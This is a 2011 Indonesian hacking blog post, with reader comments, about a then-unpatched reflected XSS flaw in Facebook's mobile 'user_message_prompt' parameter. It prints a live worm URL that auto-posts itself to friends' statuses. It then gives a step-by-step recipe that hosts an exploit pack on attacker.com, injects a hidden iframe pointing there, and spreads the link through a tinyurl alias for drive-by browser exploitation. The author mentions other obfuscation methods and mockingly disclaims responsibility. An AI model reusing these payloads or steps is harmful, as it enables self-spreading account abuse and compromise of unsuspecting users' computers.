Posted by kecoak on Mar 29, 2011

Joking on Facebook

Categories: Bug & Exploit | 8 comments

Naa, I am not a web hacker. In fact, i am not a hacker at all (eh?). Tulisan ini sekedar untuk meng-update blog kecoak yang sudah cukup lama tidak di update.

So, per hari ini saya melihat bahwa banyak sekali URL *aneh* di share pada status beberapa rekan di facebook. Sebagian besar pemerhati dunia hacking mungkin sudah menyadari letak bug nya, namun jika belum, coba lihat link berikut ini yang merupakan salah satu contoh pada facebook:

$ wget http://tinyurl.com/rahasiapribadiku
--2011-03-29 18:39:10-- http://tinyurl.com/rahasiapribadiku
Resolving tinyurl.com (tinyurl.com)... 216.218.139.86, 216.218.139.84
Connecting to tinyurl.com (tinyurl.com)|216.218.139.86|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();}</script> [following]
--2011-03-29 18:39:11-- http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='%3Cscript%3Ewindow.onload=function()%7Bdocument.forms[0].message.value='ini%20fotoku%20wkt%20lg%20ML%20http://tinyurl.com/rahasiapribadiku';document.forms[0].submit();%7D%3C/script%3E
Resolving m.facebook.com (m.facebook.com)... 66.220.149.26
Connecting to m.facebook.com (m.facebook.com)|66.220.149.26|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8882 (8.7K) [text/html]
Saving to: `prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='ini fotoku wkt lg ML http:%2F%2Ftinyurl.com%2Frahasiapribadiku';document.forms[0].submit();}<%2Fscript>'

Sudah banyak yang membahas bug nya. Bug terdapat pada variable user_message_prompt yang biasanya diakses oleh pengguna facebook mobile (via hape). Melalui variable tersebut seseorang dapat melakukan serangan XSS, yang jika di klik oleh teman nya maka akan menjadi status teman tersebut. Begitu seterusnya.

That’s all, nothing interesting…yet.

Bahaya atau tidak itu tergantung kreativitas sang attacker, untuk penikmat dunia eksploitasi, tentu saja yang menarik adalah client-side-exploitation. Sampai saat tulisan ini dibuat, facebook belum menutup bug tersebut. Membahas secara detail?well, let the others do it.

Here’s an interesting snippet for you:

1. Install Exploit Pack Kit, misal pada http://attacker.com/byteskrew-sample.
2. Klik link berikut ini pada account FB:

http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=<script>var c =escape('<iframe src=http://attacker.com/byteskrew-sample width="0" height="0" frameborder="0"></iframe>');var d=unescape(c);document.write(d);window.onload=function(){document.forms[0].message.value='Penjelasan tentang bahaya jebakan worm pada facebook, harap jangan klik sembarang URL: http://tinyurl.com/byteskrew-sample';document.forms[0].submit();}</script>

[/pre]


3. Set pada tinyurl URL diatas untuk menggunakan custom alias http://tinyurl.com/byteskrew-sample.


4. Jika kamu cukup beruntung, maka link tersebut akan menyebar seperti worm. Kecepatan penyebaran tentu saja tergantung pada teman FB, teman dari teman, teman dari teman dari teman, dst. Bersamaan dengan menyebar nya link tersebut, selain menampilkan update status, maka browser juga akan mengakses http://attacker.com/byteskrew-sample, dan jika eksploit nya oke maka kita akan mendapatkan...well, teruskan sendiri.


Simple nya, melalui media penyebaran worm yang memanfaatkan bugs pada facebook, maka client-side eksploitasi juga dapat disisipkan. Again and again and again, Riding the XSS - Spr34c1 t3h Ph34r.


Setiap orang bebas membuat joke nya masing-masing, beberapa hobi mengusili status temen-temen nya, beberapa lagi hobi mengkesploitasi browser mereka dan masuk ke dalam PC yang digunakan. Bukan begitu?.


Uh oh, did I broke my f*cking words?guess this is full-disclosure already?


PS: informasi diatas dibuat berdasarkan asumsi, benar atau tidaknya diserahkan kembali kepada para pembaca. oh, lupa, tentu saja untuk tujuan pembelajaran blablabla. you get it lah.


PPS: escape dan unescape tentu saja hanya sebagai contoh, ada banyak metode lain yang dapat digunakan ;).
Post a Comment

8 Responses to “Joking on Facebook”

  1. abidavila says:
    April 1, 2011 at 5:32 pm

    wew…nice info…!!!
    btw, gimana cara menanggulanginya kalo udah terlanjur…?

    Reply
  2. SkyNet says:
    April 3, 2011 at 9:54 pm

    HmM.. Sepertinya ini Exploit dari Masa Ke Masa Ya om.. hampir sama kek pny Friendster dan Kawan²nya :)). but thanks Nice share.

    Reply
  3. ev1lut10n says:
    May 3, 2011 at 5:11 am

    bruakakaka ngakak sumpah

    Reply
  4. iblis-pc says:
    August 9, 2011 at 12:07 am

    pengen bnget ngedalemin ilmu cracker,,,,

    maju teruz buat kecoak…

    Reply
  5. yu_dha says:
    April 15, 2013 at 7:30 pm

    hhmmm…
    pada ngomongin appa ya???

    Reply
  6. Citra Indah | Citra Gran says:
    August 21, 2013 at 2:52 pm

    wah kalau sudah dengan kode-kode aku jadi bingung.. hehehe..

    Reply
  7. anon-admin-or-user says:
    February 3, 2016 at 5:01 am

    what i can join to your website

    Reply
  8. qnc jelly gamat says:
    September 13, 2016 at 4:51 am

    ih serem bgt trnyata,, itu munculnya otomatis di setiap akun atau gimana bro?

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *